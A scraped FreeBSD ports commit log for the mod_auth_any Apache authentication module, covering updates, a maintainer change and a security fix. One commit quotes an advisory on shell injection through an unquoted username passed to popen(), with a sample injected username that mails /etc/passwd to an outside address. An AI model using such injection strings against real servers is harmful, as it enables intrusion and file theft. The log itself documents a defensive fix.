| Commit message (Collapse) | Author | Age | Files | Lines |
|---|
| |
|
|
|
|
|
|
|
|
|
|
| |
- update to 1.3.2
- update WWW
- take maintainership
PR: ports/57413
Submitted by: Clement Laforet <sheepkiller@cultdeadsheep.org>
Notes:
svn path=/head/; revision=90445
|
| |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
the server with the uid of the apache process. Background [1]:
"The module accepts a username and password from the web client,
passes them to a user-space executable (using popen(3), which invokes
a shell) and waits for a response in order to authenticate the user.
The password is quoted on the popen() command line to avoid
interpretation of shell special chars, but the username is not.
Thus a malicious user can execute commands by supplying an appropriately
crafted username. (e.g. "foo&mail me@my.home</etc/passwd")
"The problem is easily fixed by adding quotes (and escaping any
quotes already present) to the username and password in the popen
command line."
o Fix this by adding a escaping function from [2]. Then, modifying
this function appropriately with ideas from [3]. Apply the new
escaping code to mod_auth_any.
o Bump PORTREVISION
Submitted by: Security Officer (nectar),
Red Hat Security Response Team <security@redhat.com> [1]
Obtained from: mod_auth_any CVS [2],
nalin@redhat.com [3]
Notes:
svn path=/head/; revision=77439
|
| |
|
|
| |
Notes:
svn path=/head/; revision=75976
|
| |
|
|
|
|
|
|
|
|
|
| |
is better studied
o Turn PORTCOMMENT variable in Makefile back into pkg-comment files
Approved by: kris (portmgr hat),
portmgr, re (silence)
Notes:
svn path=/head/; revision=69808
|
| |
|
|
|
|
|
| |
Approved by: pat
Notes:
svn path=/head/; revision=69612
|
| |
|
|
|
|
|
| |
others variants of the apache ports can be used too.
Notes:
svn path=/head/; revision=65932
|
|
|
program to authenticate a user.
Notes:
svn path=/head/; revision=41245
|
